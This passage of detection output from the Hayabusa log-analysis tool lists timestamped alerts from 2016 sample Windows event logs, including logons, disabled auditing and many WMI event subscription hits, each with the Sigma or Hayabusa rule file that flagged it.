File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 
+09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 
+09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:31:31.000 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
+2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other 
File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 